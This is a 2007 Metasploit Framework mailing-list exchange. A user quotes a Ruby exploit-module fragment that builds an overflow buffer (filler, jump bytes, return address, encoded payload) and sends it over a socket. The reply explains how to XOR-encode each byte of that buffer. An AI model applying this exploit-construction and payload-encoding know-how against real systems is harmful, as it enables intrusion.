[framework] Need assistance with payload xor
mmiller at hick.org
mmiller at hick.org
Wed Mar 28 23:29:32 PDT 2007
On Wed, Mar 28, 2007 at 12:52:21PM -0500, ri0t wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
> filler = rand_text_english(1) * (target['Offset'])
> jump = [0xeb06eb06].pack("V")
> retadd = [target.ret].pack('V')
> buffer=jump+retadd+payload.encoded
> buffercoded= xor.encode(buffer, [0xb3].pack("V"))
> sploit = header + filler + buffercoded[0]
> sock.put(sploit)
>
> handler
> disconnect
> end
>
>
> unfortunatly the xor.encode only xor's the first byte of jump retadd
> and payload not the entire buffer. I am sure its something i am
> missing due to a simple lack of ruby knowledge but if anyone could
> point me in the right direction i would be greatful
Since you're using the Generic XOR, it defaults to using the size of the
key as the block size for encoding. I'm guessing what you actually want
to do is XOR each individual byte with 0xb3. To do this you should use
Rex::Encoding::Xor::Byte. Make sure you use [0xb3].pack("C"). I think
this should give you the results you're looking for. If it's still not
working let us know.
More information about the framework
mailing list